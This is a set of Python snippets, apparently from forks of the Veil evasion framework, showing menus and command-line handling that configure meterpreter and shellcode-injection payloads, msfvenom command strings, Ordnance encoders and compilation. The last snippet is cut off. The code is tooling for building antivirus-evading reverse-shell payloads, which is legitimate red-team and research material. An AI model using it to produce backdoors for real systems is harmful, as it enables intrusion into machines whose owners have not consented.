コード例 #1
ファイル: tool.py プロジェクト: zorroroot/Veil
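    def cli_menu(self, invoked=False):
        """Run the non-interactive (command-line) payload generation flow.

        Reads the parsed arguments in ``self.command_options``, resolves the
        payload named by ``-p``, checks ``--ip`` when one is given, fills in
        the payload's ``required_options`` (including ``-c KEY=value`` pairs)
        and then calls ``generate()`` on the payload and passes it to
        ``outfile.compiler``.

        Fatal usage errors print a message and call ``sys.exit()``; a missing
        ``-p`` only prints a message and returns.

        Args:
            invoked: Not read by this method.
        """
        options = self.command_options

        # --list-payloads
        if options.list_payloads:
            self.list_loaded_payloads()
            sys.exit()

        # Missing -p ?
        if not options.p:
            print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>).    Try: -t Evasion --list-payloads", warning=True))
            return

        user_cli_payload = self.return_payload_object(options.p)
        if not user_cli_payload:
            print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True))
            print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True))
            sys.exit()

        # The payload family is decided from substrings of its path
        is_meterpreter = "meterpreter" in user_cli_payload.path
        is_shellcode_inject = "shellcode_inject" in user_cli_payload.path

        if options.ip is None and (is_meterpreter or is_shellcode_inject):
            print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True))
            sys.exit()

        # Make sure IP is valid
        # --ip
        if options.ip is not None:
            valid_ip = helpers.validate_ip(options.ip)
            valid_hostname = helpers.validate_hostname(options.ip)

            if not valid_ip and not valid_hostname:
                print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True))
                print(helpers.color("[*] Please specify the correct value", warning=True))
                sys.exit()

        # Determine if using Ordnance or MSFVenom for shellcode generation
        if options.ordnance_payload is None and options.msfvenom is None and not is_meterpreter:
            print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True))
            sys.exit()

        if is_meterpreter:
            # Pure (shellcodeless) payload: the address goes into LHOST if
            # the payload has it, otherwise into RHOST
            required = user_cli_payload.required_options
            if "LHOST" in required:
                required["LHOST"][0] = options.ip
            elif "RHOST" in required:
                required["RHOST"][0] = options.ip
            # NOTE(review): unlike --ip, the port is stored without a range
            # check in this method - confirm it is validated upstream.
            if "LPORT" in required:
                required["LPORT"][0] = options.port
        elif is_shellcode_inject:
            # One of the two sources is always set here: the check above
            # exits when both are None for a non-meterpreter payload.
            if options.ordnance_payload is not None:
                Ordnance_object = ordnance_import.Tools(options)
                Ordnance_object.cli_menu(invoked=True)
                cli_shellcode = Ordnance_object.final_shellcode
            elif options.msfvenom is not None:
                cli_shellcode = shellcode_help.cli_msf_shellcode_gen(options)

            # Set the shellcode in the Evasion payload
            user_cli_payload.cli_shellcode = cli_shellcode

        # Loop over setting required options
        # -c
        if options.c is not None:
            for payload_option in options.c:
                if payload_option == '':
                    continue
                if "=" not in payload_option:
                    print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True))
                    sys.exit()

                # Split on the first "=" only, so a value that itself
                # contains "=" is kept whole instead of being truncated.
                key, _, value = payload_option.partition('=')
                key = key.upper()
                if key not in user_cli_payload.required_options:
                    print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True))
                    sys.exit()
                # NOTE(review): values given with -c are stored as-is; the
                # IP/hostname validators used for --ip are not applied here.
                user_cli_payload.required_options[key][0] = value

        # Generate the payload code
        # source code stored in user_cli_payload.source_code
        user_cli_payload.generate()

        # figure out how to compile the code
        outfile.compiler(user_cli_payload, invoked=True, cli_object=options)
        return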
コード例 #2
ファイル: tool.py プロジェクト: zorroroot/Veil
    def use_payload(self, selected_payload):
        """Interactive prompt loop for configuring and generating one payload.

        Installs a readline tab completer, shows the payload's options and
        then reads commands until the user goes back or a generated payload
        is compiled. Recognised command prefixes: back/main/menu, gen/run,
        exit/quit, help/option and set.

        Args:
            selected_payload: Payload object; this method reads its ``path``,
                ``language`` and ``required_options`` and calls ``generate()``.
        """
        # Tab completion, thanks Will :)
        option_completer = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
        readline.set_completer_delims(' \t\n;')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(option_completer.complete)

        self.display_payload_options(selected_payload)
        evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)

        while True:
            # The whole line is lower-cased, so option values are too
            command = input("[" + selected_payload.path + ">>]: ").strip().lower()

            if command.startswith(("back", "main", "menu")):
                break

            if command.startswith(("gen", "run")):
                # Ruby payloads: a SLEEP check needs at least one more check
                sleep_check_alone = (
                    selected_payload.language == 'ruby'
                    and selected_payload.required_options["SLEEP"][0] != "X"
                    and all(
                        selected_payload.required_options[name][0] == "X"
                        for name in ("USERNAME", "DOMAIN", "HOSTNAME")
                    )
                )
                if sleep_check_alone:
                    print(helpers.color("[*] If using SLEEP check with Ruby, you must also provide an additional check (like HOSTNAME)!", warning=True))
                    continue
                selected_payload.generate()
                if outfile.compiler(selected_payload):
                    break
                continue

            if command.startswith(("exit", "quit")):
                sys.exit(0)

            if command.startswith(("help", "option")):
                self.print_options_screen(selected_payload)
                evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
                continue

            if not command.startswith("set"):
                continue

            words = command.split()
            if len(words) != 3:
                print()
                print(helpers.color(" [!] ERROR: You did not provide a valid amount of arguments!", warning=True))
                print(helpers.color(" [*] Ex: set DOMAIN christest.com", warning=True))
                print()
                continue

            _, key, value = words
            # Option names are stored in upper case
            key = key.upper()
            if key not in selected_payload.required_options:
                print()
                print(helpers.color(" [!] ERROR: You did not provide a valid option!", warning=True))
                print(helpers.color(" [*] Ex: set LHOST 8.8.8.8", warning=True))
                print()
                continue

            # Only LHOST and LPORT are validated; other options are stored as typed
            rejection = None
            if key == "LHOST":
                if not helpers.validate_ip(value):
                    rejection = " [!] ERROR: You did not provide a valid IP!"
            elif key == "LPORT":
                if not helpers.validate_port(value):
                    rejection = " [!] ERROR: You did not provide a valid port number!"

            if rejection is None:
                selected_payload.required_options[key][0] = value
            else:
                print()
                print(helpers.color(rejection, warning=True))
                print()
        return
コード例 #3
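    def cli_menu(self, invoked=False):
        """Run the command-line flow for the Ordnance tool.

        Handles ``--list-payloads`` / ``--list-encoders`` (print and exit),
        resolves ``--ordnance-payload``, copies the validated ``--ip`` and
        port into the payload's ``required_options``, generates the shellcode
        and, when ``--encoder`` is given, runs every loaded encoder whose
        ``cli_name`` matches. The result is stored in ``self.final_shellcode``.

        Fatal usage errors print a message and call ``sys.exit()``; a missing
        ``--ordnance-payload`` only prints a message and returns.

        Args:
            invoked: When true, ``payload.payload_stats()`` is not called.
        """
        options = self.command_options

        # Check to see if we're just listing payloads or encoders
        # If so, do that and then exit
        # --list-payloads
        if options.list_payloads:
            self.print_payloads()
            sys.exit()
        # --list-encoders
        elif options.list_encoders:
            self.print_encoders()
            sys.exit()

        # Missing --ordnance-payload ?
        if not options.ordnance_payload:
            print(helpers.color(" [!] ERROR: Missing ordnance-payload selection (--ordnance-payload <payload>).    Try: -t Ordnance --list-payloads", warning=True))
            return

        payload = self.return_payload_object(options.ordnance_payload.lower())
        if not payload:
            print(helpers.color(" [!] ERROR: You specified a non-existent Ordnance payload!", warning=True))
            sys.exit()

        if "LHOST" in payload.required_options:
            # Is --ip missing?
            if options.ip is None:
                print(helpers.color(" [!] ERROR: Missing --ip <value>", warning=True))
                sys.exit()

            valid_ip = helpers.validate_ip(options.ip)
            valid_hostname = helpers.validate_hostname(options.ip)
            # A hostname is accepted only for the rev_tcp_dns payload;
            # every other payload needs a literal IP address.
            if valid_ip or (valid_hostname and payload.cli_name == 'rev_tcp_dns'):
                payload.required_options["LHOST"][0] = options.ip
            else:
                print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
                sys.exit()

        if "LPORT" in payload.required_options:
            # Valid ports are 1-65535 inclusive; the upper bound was
            # previously exclusive, which rejected port 65535.
            if 0 < options.port <= 65535:
                payload.required_options["LPORT"][0] = options.port
            else:
                print(helpers.color(" [!] ERROR: Invalid port number provided!", warning=True))
                print(helpers.color("[*] Try again?", warning=True))
                sys.exit()

        # Generate the original shellcode
        payload.cli_gen_shellcode()
        self.final_shellcode = payload.customized_shellcode

        # Check if an encoder is being called by the user
        if options.encoder is not None:
            encoder_found_here = False
            if "BadChars" in payload.required_options:
                payload.required_options["BadChars"][0] = options.bad_chars
            # No break: every loaded encoder with a matching name is applied
            for loaded_encoder in self.active_encoders.values():
                if options.encoder.lower() == loaded_encoder.cli_name:
                    encoder_found_here = True
                    loaded_encoder.cli_encode(payload)
            if not encoder_found_here:
                print(helpers.color(" [!] ERROR: Encoder you specified was not found!", warning=True))
                print(helpers.color("[*] Try again?", warning=True))
                sys.exit()
            self.final_shellcode = payload.customized_shellcode

        if not invoked:
            payload.payload_stats()
        return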
コード例 #4
ファイル: shellcode_help.py プロジェクト: yuhisern7/Veil
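    def menu(self):
        """
        Main interactive menu for shellcode selection.

        Utilizes Completer() to do tab completion on
        loaded metasploit payloads.

        Does nothing when a generation method is already set (either
        ``self.msfvenomCommand`` or ``self.custom_shellcode`` is non-empty).
        Otherwise asks ``self.payload_selection_menu`` for the source and
        then either flags Ordnance (``self.invoke_ordnance``), stores the
        custom shellcode, or prompts for an msfvenom payload and its options
        and stores the resulting command line in ``self.msfvenomCommand``.
        """
        selected_payload = None
        options = None

        # a generation method has already been selected
        if self.msfvenomCommand != "" or self.custom_shellcode != "":
            return

        # show banner?
        showMessage = settings.TERMINAL_CLEAR != "false"

        # prompt for custom shellcode or msfvenom
        custom_shellcode = self.payload_selection_menu(showMessage)

        # if custom shellcode is specified, set it
        if custom_shellcode == "ordnance":
            # Start figuring out Ordnance stuff here
            self.invoke_ordnance = True
            return

        if custom_shellcode:
            self.custom_shellcode = custom_shellcode
            return

        # else, if no custom shellcode is specified, prompt for metasploit

        # Errors a missing or malformed preset in self.required_options can
        # raise; listed explicitly so the lookups below no longer use a bare
        # "except:".
        no_preset = (AttributeError, KeyError, IndexError, TypeError)

        # instantiate our completer object for tab completion of available payloads
        comp = completer.MSFCompleter(self.payload_tree)

        # we want to treat '/' as part of a word, so override the delimiters
        readline.set_completer_delims(' \t\n;')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(comp.complete)

        # have the user select the payload
        while selected_payload is None:

            print('\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True))
            print(' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True))

            try:
                selected_payload = self.required_options['MSF_PAYLOAD'][0]
                print(' [>] Please enter metasploit payload: %s' % (selected_payload))
            except no_preset:
                selected_payload = input(' [>] Please enter metasploit payload: ').strip().lower()

            if selected_payload == "":
                # default to reverse_tcp for the payload
                selected_payload = "windows/meterpreter/reverse_tcp"
            try:
                # walk down the selected parts of the payload tree to get to the options at the bottom
                options = self.payload_tree
                for part in selected_payload.split("/"):
                    options = options[part]

            except (KeyError, TypeError):
                # make sure user entered a valid payload; TypeError covers a
                # path that continues past a non-mapping node of the tree
                # NOTE(review): the preset is read from 'MSF_PAYLOAD' but the
                # key removed here is 'PAYLOAD'; an invalid 'MSF_PAYLOAD'
                # preset would be re-read on every pass - confirm which key
                # is intended.
                if 'PAYLOAD' in self.required_options:
                    del self.required_options['PAYLOAD']
                print(helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True))
                selected_payload = None

        # remove the tab completer
        readline.set_completer(None)

        # set the internal payload to the one selected
        self.msfvenompayload = selected_payload

        # request a value for each required option
        for option in options:
            value = ""
            while value == "":

                ### VALIDATION ###
                # LHOST is a special case, so we can tab complete the local IP
                if option == "LHOST":
                    try:
                        value = self.required_options['LHOST'][0]
                    except no_preset:
                        value = ""

                    if value:
                        print(' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value))
                    else:
                        # No preset, or a rejected preset that was cleared to
                        # '' below: prompt instead of re-reading the empty
                        # value forever.
                        # set the completer to fill in the local IP
                        readline.set_completer(completer.IPCompleter().complete)
                        value = input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()

                    error = None
                    if '.' in value:
                        # if the last chunk is a number, assume it's an IP address
                        if value.split(".")[-1].isdigit():
                            if not helpers.validate_ip(value):
                                error = "\n [!] ERROR: Bad IP address specified.\n"
                        # otherwise assume we've been passed a domain name
                        elif not helpers.validate_hostname(value):
                            error = "\n [!] ERROR: Bad hostname specified.\n"
                    elif ':' in value:
                        # anything with a colon has to parse as IPv6
                        try:
                            socket.inet_pton(socket.AF_INET6, value)
                        except socket.error:
                            error = "\n [!] ERROR: Bad IP address or hostname specified.\n"
                    else:
                        error = "\n [!] ERROR: Bad IP address or hostname specified.\n"

                    if error is not None:
                        if 'LHOST' in self.required_options:
                            self.required_options['LHOST'][0] = ''
                        print(helpers.color(error, warning=True))
                        value = ""

                elif option == "LPORT":
                    try:
                        value = self.required_options['LPORT'][0]
                    except no_preset:
                        value = ""

                    if value:
                        print(' [>] Enter value for \'LPORT\': %s' % (value))
                    else:
                        # set the completer to fill in the default MSF port (4444)
                        readline.set_completer(completer.MSFPortCompleter().complete)
                        value = input(' [>] Enter value for \'LPORT\': ').strip()

                    try:
                        # Valid ports are 1-65535 inclusive; the upper bound
                        # was previously exclusive and rejected 65535.
                        port_ok = 0 < int(value) <= 65535
                    except ValueError:
                        port_ok = False

                    if not port_ok:
                        print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
                        if 'LPORT' in self.required_options:
                            self.required_options['LPORT'][0] = ''
                        value = ""

                else:
                    value = input(' [>] Enter value for \'' + option + '\': ').strip()

            # append all the msfvenom options
            self.msfvenom_options.append(option + "=" + value)

        # allow the user to input any extra OPTION=value pairs
        extra_msf_options = []
        while True:
            # clear out the tab completion
            readline.set_completer(completer.none().complete)
            selection = input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
            if selection == "":
                break

            for xtra_opt in selection.split(' '):
                # "!=" rather than "is not": identity against a literal is
                # not a reliable string comparison.
                if xtra_opt != '':
                    if "=" not in xtra_opt:
                        print(helpers.color(" [!] Parameter not entered in correct syntax.\n", warning=True))
                        continue
                    # Split on the first "=" only so values containing "="
                    # are not truncated.
                    opt_name, _, opt_value = xtra_opt.partition('=')
                    # "-OPTION=value" becomes "-OPTION value"; plain
                    # "OPTION=value" is passed through unchanged
                    separator = " " if "-" in opt_name else "="
                    extra_msf_options.append(opt_name + separator + opt_value)

        # grab any specified msfvenom options in the /etc/veil/settings.py file
        msfvenom_options = ""
        if hasattr(settings, "MSFVENOM_OPTIONS"):
            msfvenom_options = settings.MSFVENOM_OPTIONS

        # build out the msfvenom command
        # NOTE(review): the command is assembled by plain string
        # concatenation and ends in a pipeline, so it presumably runs
        # through a shell. Option values, the extra options and
        # settings.MSFVENOM_OPTIONS are inserted unquoted; if any of them
        # can come from a source other than the local operator, quote each
        # token (shlex.quote) or pass an argument list instead.
        self.msfvenomCommand = "msfvenom " + msfvenom_options + " -p " + selected_payload
        for option in self.msfvenom_options:
            self.msfvenomCommand += " " + option
            self.options.append(option)
        if extra_msf_options:
            self.msfvenomCommand += " " + " ".join(extra_msf_options)
        self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
        return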
コード例 #5
ファイル: tool.py プロジェクト: Veil-Framework/Veil
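    def use_payload(self, selected_payload):
        """Interactive prompt loop for configuring and generating one payload.

        Installs a readline tab completer, shows the payload's options and
        then reads commands until the user goes back or a generated payload
        is compiled. Recognised command prefixes: back/main/menu, gen/run,
        exit/quit, help/option and set.

        Args:
            selected_payload: Payload object; this method reads its ``path``,
                ``language`` and ``required_options`` and calls ``generate()``.
        """
        # Tab completion, thanks Will :)
        comp = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
        readline.set_completer_delims(' \t\n;')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(comp.complete)

        self.display_payload_options(selected_payload)

        evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)

        while True:
            # The whole line is lower-cased, so option values are too
            payload_options_command = input("[" + selected_payload.path + ">>]: ").strip().lower()

            if payload_options_command.startswith(("back", "main", "menu")):
                break

            elif payload_options_command.startswith(("gen", "run")):
                # Ruby payloads: a SLEEP check needs at least one more check
                if selected_payload.language == 'ruby' and selected_payload.required_options["SLEEP"][0] != "X" and selected_payload.required_options["USERNAME"][0] == "X" and selected_payload.required_options["DOMAIN"][0] == "X" and selected_payload.required_options["HOSTNAME"][0] == "X":
                    print(helpers.color("[*] If using SLEEP check with Ruby, you must also provide an additional check (like HOSTNAME)!", warning=True))
                else:
                    selected_payload.generate()
                    if outfile.compiler(selected_payload):
                        break

            elif payload_options_command.startswith(("exit", "quit")):
                sys.exit(0)

            elif payload_options_command.startswith(("help", "option")):
                self.print_options_screen(selected_payload)
                evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)

            elif payload_options_command.startswith("set"):
                command_parts = payload_options_command.split()
                if len(command_parts) == 3:
                    set_command, key, value = command_parts
                    # Make sure it is uppercase
                    key = key.upper()
                    if key in selected_payload.required_options:
                        # Compare with "==", not "is": key is a freshly built
                        # string from .upper(), so an identity test against a
                        # literal does not reliably match and the LHOST/LPORT
                        # validators below would be skipped.
                        # Validate LHOST value
                        if key == "LHOST":
                            if helpers.validate_ip(value):
                                selected_payload.required_options[key][0] = value
                            else:
                                print()
                                print(helpers.color(" [!] ERROR: You did not provide a valid IP!", warning=True))
                                print()
                        # Validate LPORT
                        elif key == "LPORT":
                            if helpers.validate_port(value):
                                selected_payload.required_options[key][0] = value
                            else:
                                print()
                                print(helpers.color(" [!] ERROR: You did not provide a valid port number!", warning=True))
                                print()

                        else:
                            # Set other options (stored without validation)
                            selected_payload.required_options[key][0] = value
                    else:
                        print()
                        print(helpers.color(" [!] ERROR: You did not provide a valid option!", warning=True))
                        print(helpers.color(" [*] Ex: set LHOST 8.8.8.8", warning=True))
                        print()

                else:
                    print()
                    print(helpers.color(" [!] ERROR: You did not provide a valid amount of arguments!", warning=True))
                    print(helpers.color(" [*] Ex: set DOMAIN christest.com", warning=True))
                    print()
        return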
コード例 #6
ファイル: tool.py プロジェクト: yuhisern7/Veil
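    def cli_menu(self, invoked=False):
        """Run the command-line flow for the Ordnance tool.

        Handles the list-payloads / list-encoders options (print and exit),
        then looks through ``self.active_shellcode`` for payloads whose
        ``cli_name`` equals the lower-cased ``ordnance_payload`` option. For
        each match it copies the validated IP and port into the payload's
        ``required_options``, generates the shellcode, optionally applies the
        requested encoder and stores the result in ``self.final_shellcode``.

        Fatal usage errors print a message and call ``sys.exit()``. Nothing
        happens when no ``ordnance_payload`` option was given.

        Args:
            invoked: When true, ``payload.payload_stats()`` is not called.
        """
        options = self.command_options

        # Check to see if we're just listing payloads or encoders
        # If so, do that and then exit
        if options.list_payloads:
            self.print_payloads()
            sys.exit()
        elif options.list_encoders:
            self.print_encoders()
            sys.exit()

        # Now let's check for payloads we're doing
        if not options.ordnance_payload:
            return

        payload_found = False
        for payload in self.active_shellcode.values():
            if options.ordnance_payload.lower() != payload.cli_name:
                continue
            payload_found = True

            if "LHOST" in payload.required_options:
                # NOTE(review): the ip option is passed to the validators
                # without a None check in this method - confirm they handle
                # a missing value.
                valid_ip = helpers.validate_ip(options.ip)
                valid_hostname = helpers.validate_hostname(options.ip)
                # A hostname is accepted only for the rev_tcp_dns payload;
                # every other payload needs a literal IP address.
                if valid_ip or (valid_hostname and payload.cli_name == 'rev_tcp_dns'):
                    payload.required_options["LHOST"][0] = options.ip
                else:
                    print(helpers.color("[*] Error: Invalid IP/Hostname specified!", warning=True))
                    print(helpers.color("[*] Try again?", warning=True))
                    sys.exit()

            if "LPORT" in payload.required_options:
                # Valid ports are 1-65535 inclusive; the upper bound was
                # previously exclusive, which rejected port 65535.
                if 0 < options.port <= 65535:
                    payload.required_options["LPORT"][0] = options.port
                else:
                    print(helpers.color("[*] Error: Invalid port number provided!", warning=True))
                    print(helpers.color("[*] Try again?", warning=True))
                    sys.exit()

            # Generate the original shellcode
            payload.cli_gen_shellcode()
            self.final_shellcode = payload.customized_shellcode

            # Check if an encoder is being called by the user
            if options.encoder is not None:
                encoder_found_here = False
                if "BadChars" in payload.required_options:
                    payload.required_options["BadChars"][0] = options.bad_chars
                # No break: every loaded encoder with a matching name is applied
                for loaded_encoder in self.active_encoders.values():
                    if options.encoder.lower() == loaded_encoder.cli_name:
                        encoder_found_here = True
                        loaded_encoder.cli_encode(payload)
                if not encoder_found_here:
                    print(helpers.color("[*] Error: Encoder you specified was not found!", warning=True))
                    print(helpers.color("[*] Try again?", warning=True))
                    sys.exit()
                self.final_shellcode = payload.customized_shellcode

            if not invoked:
                payload.payload_stats()

        # If the payload supplied isn't found
        if not payload_found:
            print(helpers.color("[*] Error: You specified a non-existent Ordnance payload!", warning=True))
            print(helpers.color("[*] Go to start... do not collect $200!", warning=True))
            sys.exit()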
コード例 #7
ファイル: tool.py プロジェクト: Veil-Framework/Veil
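    def cli_menu(self, invoked=False):
        """Run one non-interactive generation from the parsed CLI options.

        Reads ``self.command_options`` (``list_payloads``, ``p``, ``ip``,
        ``port``, ``ordnance_payload``, ``msfvenom``, ``c``), copies the
        values into the selected payload's ``required_options``, calls the
        payload's ``generate()`` and passes it to ``outfile.compiler``.

        Missing or invalid options print an error and end the process with
        ``sys.exit()``; a missing ``-p`` only prints an error and returns.

        Args:
            invoked: accepted for interface compatibility; not read here
                (``outfile.compiler`` is always called with ``invoked=True``).
        """
        # --list-payloads
        if self.command_options.list_payloads:
            self.list_loaded_payloads()
            sys.exit()

        # Check if a payload is provided, and if so, start the generation
        # process
        # Missing -p ?
        if not self.command_options.p:
            print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>).    Try: -t Evasion --list-payloads", warning=True))
        else:
            user_cli_payload = self.return_payload_object(self.command_options.p)
            if not user_cli_payload:
                print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True))
                print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True))
                sys.exit()
            if self.command_options.ip is None and ("meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path):
                print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True))
                sys.exit()

            # Make sure IP is valid
            # --ip
            if self.command_options.ip is not None:
                valid_ip = helpers.validate_ip(self.command_options.ip)
                valid_hostname = helpers.validate_hostname(self.command_options.ip)

                if not valid_ip and not valid_hostname:
                    print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True))
                    print(helpers.color("[*] Please specify the correct value", warning=True))
                    sys.exit()

            # Determine if using Ordnance or MSFVenom for shellcode generation
            if self.command_options.ordnance_payload is None and self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
                print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True))
                sys.exit()

            # Check if using a pure payload (shellcodeless)
            if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
                if "meterpreter" in user_cli_payload.path:
                    # Check for where the IP is being stored
                    if "LHOST" in user_cli_payload.required_options:
                        user_cli_payload.required_options["LHOST"][0] = self.command_options.ip
                    elif "RHOST" in user_cli_payload.required_options:
                        user_cli_payload.required_options["RHOST"][0] = self.command_options.ip
                    # Store the LPORT value in the payload
                    # NOTE(review): the port is stored as given; no range
                    # check is applied in this method.
                    if "LPORT" in user_cli_payload.required_options:
                        user_cli_payload.required_options["LPORT"][0] = self.command_options.port
                else:
                    # One of the two sources below is always set here: the
                    # shellcode-option check above exits when both are None.
                    # If ordnance, generate shellcode through it
                    if self.command_options.ordnance_payload is not None:
                        Ordnance_object = ordnance_import.Tools(self.command_options)
                        Ordnance_object.cli_menu(invoked=True)
                        cli_shellcode = Ordnance_object.final_shellcode
                    # Or if msfvenom, get that code
                    elif self.command_options.msfvenom is not None:
                        cli_shellcode = shellcode_help.cli_msf_shellcode_gen(self.command_options)
                    # This could be the future area for adding custom shellcode. If there
                    # is a need I can add it in

                    # Set the shellcode in the Evasion payload
                    user_cli_payload.cli_shellcode = cli_shellcode

            # Loop over setting required options
            # -c
            if self.command_options.c is not None:
                for payload_option in self.command_options.c:
                    # Compare by value: an identity test against a string
                    # literal is implementation-dependent and raises a
                    # SyntaxWarning on Python 3.8+.
                    if payload_option != '':
                        if "=" not in payload_option:
                            print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True))
                            sys.exit()
                        else:
                            # Split on the first "=" only, so a value that
                            # itself contains "=" is stored whole instead of
                            # being cut at the second "=".
                            key, _, value = payload_option.partition('=')
                            key = key.upper()
                            if key in user_cli_payload.required_options:
                                user_cli_payload.required_options[key][0] = value
                            else:
                                print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True))
                                sys.exit()

            # Generate the payload code
            # source code stored in user_cli_payload.source_code
            user_cli_payload.generate()

            # figure out how to compile the code
            outfile.compiler(user_cli_payload, invoked=True, cli_object=self.command_options)
        return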
コード例 #8
ファイル: shellcode_help.py プロジェクト: Veil-Framework/Veil
    def menu(self):
        """
        Main interactive menu for shellcode selection.

        Utilizes Completer() to do tab completion on
        loaded metasploit payloads.

        Does nothing unless both self.msfvenomCommand and
        self.custom_shellcode are still empty. In that case the result of
        self.payload_selection_menu() decides the path: "ordnance" sets
        self.invoke_ordnance, any other non-empty value is stored as
        self.custom_shellcode, and an empty value starts the msfvenom
        prompts, which end by storing a command string in
        self.msfvenomCommand. Returns None.
        """
        selected_payload = None
        options = None
        showMessage = False
        if settings.TERMINAL_CLEAR != "false":
            showMessage = True

        # if no generation method has been selected yet
        if self.msfvenomCommand == '' and self.custom_shellcode == '':

            # show banner?
            if settings.TERMINAL_CLEAR != "false":
                showMessage = True

            # prompt for custom shellcode or msfvenom
            custom_shellcode = self.payload_selection_menu(showMessage)

            # if custom shellcode is specified, set it
            if custom_shellcode == "ordnance":
                # Start figuring out Ordnance stuff here
                self.invoke_ordnance = True

            elif custom_shellcode:
                self.custom_shellcode = custom_shellcode

            # else, if no custom shellcode is specified, prompt for metasploit
            else:

                # instantiate our completer object for tab completion of available payloads
                comp = completer.MSFCompleter(self.payload_tree)

                # we want to treat '/' as part of a word, so override the delimiters
                readline.set_completer_delims(' \t\n;')
                readline.parse_and_bind("tab: complete")
                readline.set_completer(comp.complete)

                # have the user select the payload
                while selected_payload is None:

                    print('\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True))
                    print(' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True))

                    # use a preset payload if one is stored, otherwise prompt
                    # NOTE(review): the bare except also catches anything
                    # other than a missing key; naming the expected
                    # exceptions would be narrower.
                    try:
                        selected_payload = self.required_options['MSF_PAYLOAD'][0]
                        print(' [>] Please enter metasploit payload: %s' % (selected_payload))
                    except:
                        selected_payload = input(' [>] Please enter metasploit payload: ').strip().lower()

                    if selected_payload == '':
                        # default to reverse_tcp for the payload
                        selected_payload = "windows/meterpreter/reverse_tcp"
                    try:
                        parts = selected_payload.split("/")
                        # walk down the selected parts of the payload tree to get to the options at the bottom
                        options = self.payload_tree
                        for part in parts:
                            options = options[part]

                    except KeyError:
                        # make sure user entered a valid payload
                        # NOTE(review): the preset is read from 'MSF_PAYLOAD'
                        # above but 'PAYLOAD' is the key removed here, so an
                        # invalid preset would be read again on the next
                        # pass - confirm which key is intended.
                        if 'PAYLOAD' in self.required_options:
                            del self.required_options['PAYLOAD']
                        print(helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True))
                        selected_payload = None

                # remove the tab completer
                readline.set_completer(None)

                # set the internal payload to the one selected
                self.msfvenompayload = selected_payload

                # request a value for each required option
                for option in options:
                    value = ""
                    # an empty value means "not accepted yet": every failed
                    # check below resets value to "" to repeat the prompt
                    while value == '':

                        ### VALIDATION ###
                        # LHOST is a special case, so we can tab complete the local IP
                        if option == "LHOST":

                            try:
                                value = self.required_options['LHOST'][0]
                                print(' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value))
                            except:
                                # set the completer to fill in the local IP
                                readline.set_completer(completer.IPCompleter().complete)
                                value = input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()

                            # NOTE(review): most failure branches below reset
                            # the stored preset to "" but leave the key in
                            # place, so the next pass reads "" again rather
                            # than prompting; only one branch deletes the
                            # key. Confirm this cannot loop on a bad preset.
                            if '.' in value:

                                hostParts = value.split(".")
                                if len(hostParts) > 1:

                                    # if the last chunk is a number, assume it's an IP address
                                    if hostParts[-1].isdigit():

                                        # do a IP validation check
                                        if not helpers.validate_ip(value):
                                            if 'LHOST' in self.required_options:
                                                self.required_options['LHOST'][0] = ""
                                            print(helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True))
                                            value = ""

                                    # otherwise assume we've been passed a domain name
                                    else:
                                        if not helpers.validate_hostname(value):
                                            if 'LHOST' in self.required_options:
                                                self.required_options['LHOST'][0] = ""
                                            print(helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True))
                                            value = ""

                                # if we don't have at least one period in the hostname/IP
                                else:
                                    if 'LHOST' in self.required_options:
                                        del self.required_options['LHOST']
                                    print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
                                    value = ""

                            # a value with ':' and no '.' is checked as an IPv6 address
                            elif ':' in value:
                                try:
                                    socket.inet_pton(socket.AF_INET6, value)
                                except socket.error:
                                    if 'LHOST' in self.required_options:
                                        self.required_options['LHOST'][0] = ""
                                    print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
                                    value = ""

                            else:
                                if 'LHOST' in self.required_options:
                                    self.required_options['LHOST'][0] = ""
                                print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
                                value = ""

                        elif option == "LPORT":
                            try:
